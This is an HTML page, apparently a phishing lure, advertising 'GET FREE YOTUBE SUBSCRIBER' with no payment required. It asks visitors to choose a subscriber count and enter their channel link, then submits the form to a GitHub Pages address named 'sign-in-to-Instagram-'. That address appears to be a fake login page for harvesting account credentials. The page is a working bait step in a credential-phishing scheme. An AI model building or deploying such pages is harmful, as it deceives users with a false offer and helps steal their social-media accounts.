<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" href="Ads.css">
  <title>Get more subscribers on YouTube</title>
</head>
<style type="text/css">
body {
  background-color: black;
  margin: 0px;
  color: white;
}
  #giffoto {
    width: 100%;
  }
  .boostwithus {
    width: 100%;
    text-align: center;
    font-size:25px;
  }
  .selctamount {
    background-color: #67c6bee9;
    font-size: 12px;
    text-align: center;
    border-top: 1px solid black;
    border-bottom: 1px solid black;
  }
  #editselected {
    background-color: black;
    color: white;
    width: 80%;
    height: 50px;
    border-radius: 10px;
  }
  #proceedbutton {
    width: 300px;
    height: 60px;
                   margin: 5px;
                   border: 0;
                   box-shadow: 0 0 2px rgba(0, 0, 0, 0.1);px;
                   background-color: #0095f6;
  color: #fff;
  padding: 10px;
  border: none;
  border-radius: 25px;
  cursor: pointer;
  font-size: 20px;
  }
  .downpics7 {
    width: 100%;
    margin: 0px;
  }
  footer {
    margin: 0px;
  }
  input {
    background-color: white;
    color: black;
    border-radius: 10px;
    border: none;
    width: 250px;
    height: 50px;
    padding: 5px;
  }
  .hhhh {
    font-size: 20px;
  }
</style>
<body>
  <header>
    <img src="youtube.jpeg" id="giffoto">
  </header>
  <center>
  <p>
    <h1 class="boostwithus">
     GET FREE YOTUBE SUBSCRIBER. <h2> NO PAYMENT IS REQUIRED </h2>
    </h1>
    <div class="selctamount">
    <h2 class="hhhh">
      select the amount of subscribers you want to get on your channel
    </h2>
    <select id="editselected" readonly="1k">
      <option> 1k </option>
      <option> 2k </option>
      <option> 3k </option>
      <option> 5k</option>
      <option> 6k</option>
      <option> 8k </option>
      <option> 10k </option>
      <option> 20k </option>
      <option> 50k </option>
      <option> 100k </option>
    </select>
    </div>
    <div class="emaildeposit"> 
    <p class="instagramlink"> Enter your  channel link </p>
   <form action="https://boostech12.github.io/sign-in-to-Instagram-/">
     <input type="url" placeholder="enter a link to your account" required="">
       <button type="submit" id="proceedbutton"> NEXT</button>
   </form>
    </div>
    <div id="proceedkey">
      <a href="#">
      </a>
      </div>
  </p>
</body>
 </html>
